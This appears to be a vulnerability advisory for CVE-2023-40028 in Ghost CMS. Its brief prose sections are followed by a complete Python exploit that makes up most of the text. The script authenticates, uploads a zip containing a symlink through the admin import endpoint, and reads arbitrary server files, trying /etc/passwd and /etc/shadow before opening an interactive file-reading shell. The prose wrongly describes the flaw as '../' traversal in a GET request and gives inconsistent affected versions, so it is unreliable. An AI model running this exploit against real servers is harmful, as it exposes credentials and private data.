Overview
The recent vulnerability identified as CVE-2023-40028 affects Ghost CMS version 5.59.1, allowing attackers to perform arbitrary file read operations. This flaw can be exploited to access sensitive files on the server, potentially leading to unauthorized data exposure and significant security breaches.
Technical Details
This vulnerability arises from improper input validation within the file handling functions of Ghost CMS. Attackers can manipulate requests to read files outside the intended directories by crafting specific HTTP requests. For instance, an attacker could use directory traversal techniques, such as including sequences like ../, to access critical configuration files or user data stored on the server.
The exploitation of this vulnerability typically involves sending a specially crafted GET request that targets the vulnerable endpoint. If successful, the attacker can retrieve files such as config.json or other sensitive data, which may contain database credentials or API keys, thereby escalating the risk of further attacks.
Impact
The consequences of this vulnerability can be severe. Successful exploitation could lead to unauthorized access to sensitive information, including user credentials, configuration files, and other proprietary data. This not only jeopardizes the integrity of the affected website but also poses a risk to its users, potentially leading to data breaches, identity theft, and reputational damage for organizations relying on Ghost CMS.
Mitigation
To protect against CVE-2023-40028, organizations using Ghost CMS should immediately update to the latest version, which includes patches addressing this vulnerability. Regularly applying security updates is crucial for minimizing risks associated with known vulnerabilities.
Additionally, security professionals should implement web application firewalls (WAFs) to monitor and filter malicious traffic. Employing strict access controls and regularly auditing server configurations can further bolster defenses against arbitrary file read vulnerabilities. It is also advisable to conduct routine security assessments and vulnerability scans to identify and remediate potential weaknesses in the system.
Proof of Concept (PoC)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# Exploit Title: Ghost CMS 5.59.1 - Arbitrary File Read
# Date: 2023-09-20
# Exploit Author: ibrahimsql (https://github.com/ibrahmsql)
# Vendor Homepage: https://ghost.org
# Software Link: https://github.com/TryGhost/Ghost
# Version: < 5.59.1
# Tested on: Ubuntu 20.04 LTS, Windows 10, macOS Big Sur
# CVE: CVE-2023-40028
# Category: Web Application Security
# CVSS Score: 6.5 (Medium)
# Description:
# Ghost CMS versions prior to 5.59.1 contain a vulnerability that allows authenticated users
# to upload files that are symlinks. This can be exploited to perform arbitrary file reads
# of any file on the host operating system. The vulnerability exists in the file upload
# mechanism which improperly validates symlink files, allowing attackers to access files
# outside the intended directory structure through symlink traversal.
# Requirements: requests>=2.28.1, zipfile, tempfile
# Usage Examples:
# python3 CVE-2023-40028.py http://localhost:2368 [email protected] password123
# python3 CVE-2023-40028.py https://ghost.example.com [email protected] mypassword
# Interactive Usage:
# After running the script, you can use the interactive shell to read files:
# file> /etc/passwd
# file> /etc/shadow
# file> /var/log/ghost/ghost.log
# file> exit
"""
import requests
import sys
import os
import tempfile
import zipfile
import random
import string
from typing import Optional
class ExploitResult:
def __init__(self):
self.success = False
self.file_content = ""
self.status_code = 0
self.description = "Ghost CMS < 5.59.1 allows authenticated users to upload symlink files for arbitrary file read"
self.severity = "Medium"
class GhostArbitraryFileRead:
def __init__(self, ghost_url: str, username: str, password: str, verbose: bool = True):
self.ghost_url = ghost_url.rstrip('/')
self.username = username
self.password = password
self.verbose = verbose
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.9'
})
self.api_url = f"{self.ghost_url}/ghost/api/v3/admin"
def authenticate(self) -> bool:
"""Authenticate with Ghost CMS admin panel"""
login_data = {
'username': self.username,
'password': self.password
}
headers = {
'Origin': self.ghost_url,
'Accept-Version': 'v3.0',
'Content-Type': 'application/json'
}
try:
response = self.session.post(
f"{self.api_url}/session/",
json=login_data,
headers=headers,
timeout=10
)
if response.status_code == 201:
if self.verbose:
print("[+] Successfully authenticated with Ghost CMS")
return True
else:
if self.verbose:
print(f"[-] Authentication failed: {response.status_code}")
return False
except requests.RequestException as e:
if self.verbose:
print(f"[-] Authentication error: {e}")
return False
def generate_random_name(self, length: int = 13) -> str:
"""Generate random string for image name"""
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
def create_exploit_zip(self, target_file: str) -> Optional[str]:
"""Create exploit zip file with symlink"""
try:
# Create temporary directory
temp_dir = tempfile.mkdtemp()
exploit_dir = os.path.join(temp_dir, 'exploit')
images_dir = os.path.join(exploit_dir, 'content', 'images', '2024')
os.makedirs(images_dir, exist_ok=True)
# Generate random image name
image_name = f"{self.generate_random_name()}.png"
symlink_path = os.path.join(images_dir, image_name)
# Create symlink to target file
os.symlink(target_file, symlink_path)
# Create zip file
zip_path = os.path.join(temp_dir, 'exploit.zip')
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
for root, dirs, files in os.walk(exploit_dir):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, temp_dir)
zipf.write(file_path, arcname)
return zip_path, image_name
except Exception as e:
if self.verbose:
print(f"[-] Error creating exploit zip: {e}")
return None, None
def upload_exploit(self, zip_path: str) -> bool:
"""Upload exploit zip file to Ghost CMS"""
try:
headers = {
'X-Ghost-Version': '5.58',
'X-Requested-With': 'XMLHttpRequest',
'Origin': self.ghost_url,
'Referer': f"{self.ghost_url}/ghost/"
}
with open(zip_path, 'rb') as f:
files = {
'importfile': ('exploit.zip', f, 'application/zip')
}
response = self.session.post(
f"{self.api_url}/db",
files=files,
headers=headers,
timeout=30
)
if response.status_code in [200, 201]:
if self.verbose:
print("[+] Exploit zip uploaded successfully")
return True
else:
if self.verbose:
print(f"[-] Upload failed: {response.status_code}")
return False
except requests.RequestException as e:
if self.verbose:
print(f"[-] Upload error: {e}")
return False
def read_file(self, target_file: str) -> ExploitResult:
"""Read arbitrary file using symlink upload"""
result = ExploitResult()
if not self.authenticate():
return result
if self.verbose:
print(f"[*] Attempting to read file: {target_file}")
# Create exploit zip
zip_path, image_name = self.create_exploit_zip(target_file)
if not zip_path:
return result
try:
# Upload exploit
if self.upload_exploit(zip_path):
# Try to access the symlinked file
file_url = f"{self.ghost_url}/content/images/2024/{image_name}"
response = self.session.get(file_url, timeout=10)
if response.status_code == 200 and len(response.text) > 0:
result.success = True
result.file_content = response.text
result.status_code = response.status_code
if self.verbose:
print(f"[+] Successfully read file: {target_file}")
print(f"[+] File content length: {len(response.text)} bytes")
else:
if self.verbose:
print(f"[-] Failed to read file: {response.status_code}")
except Exception as e:
if self.verbose:
print(f"[-] Error during exploit: {e}")
finally:
# Cleanup
try:
if zip_path and os.path.exists(zip_path):
os.remove(zip_path)
temp_dir = os.path.dirname(zip_path) if zip_path else None
if temp_dir and os.path.exists(temp_dir):
import shutil
shutil.rmtree(temp_dir)
except:
pass
return result
def interactive_shell(self):
"""Interactive shell for file reading"""
print("n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Shell ===")
print("Enter file paths to read (type 'exit' to quit)")
while True:
try:
file_path = input("file> ").strip()
if file_path.lower() == 'exit':
print("Bye Bye!")
break
if not file_path:
print("Please enter a file path")
continue
if ' ' in file_path:
print("Please enter full file path without spaces")
continue
result = self.read_file(file_path)
if result.success:
print(f"n--- Content of {file_path} ---")
print(result.file_content)
print("--- End of file ---n")
else:
print(f"Failed to read file: {file_path}")
except KeyboardInterrupt:
print("nExiting...")
break
except Exception as e:
print(f"Error: {e}")
def main():
if len(sys.argv) != 4:
print("Usage: python3 CVE-2023-40028.py <ghost_url> <username> <password>")
print("Example: python3 CVE-2023-40028.py http://localhost:2368 [email protected] password123")
return
ghost_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
exploit = GhostArbitraryFileRead(ghost_url, username, password, verbose=True)
# Test with common sensitive files
test_files = [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/proc/version",
"/var/log/ghost/ghost.log"
]
print("n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Exploit ===")
print(f"Target: {ghost_url}")
print(f"Username: {username}")
# Test authentication first
if not exploit.authenticate():
print("[-] Authentication failed. Please check credentials.")
return
print("n[*] Testing common sensitive files...")
for test_file in test_files:
result = exploit.read_file(test_file)
if result.success:
print(f"[+] Successfully read: {test_file}")
print(f" Content preview: {result.file_content[:100]}...")
else:
print(f"[-] Failed to read: {test_file}")
# Start interactive shell
exploit.interactive_shell()
if __name__ == "__main__":
main()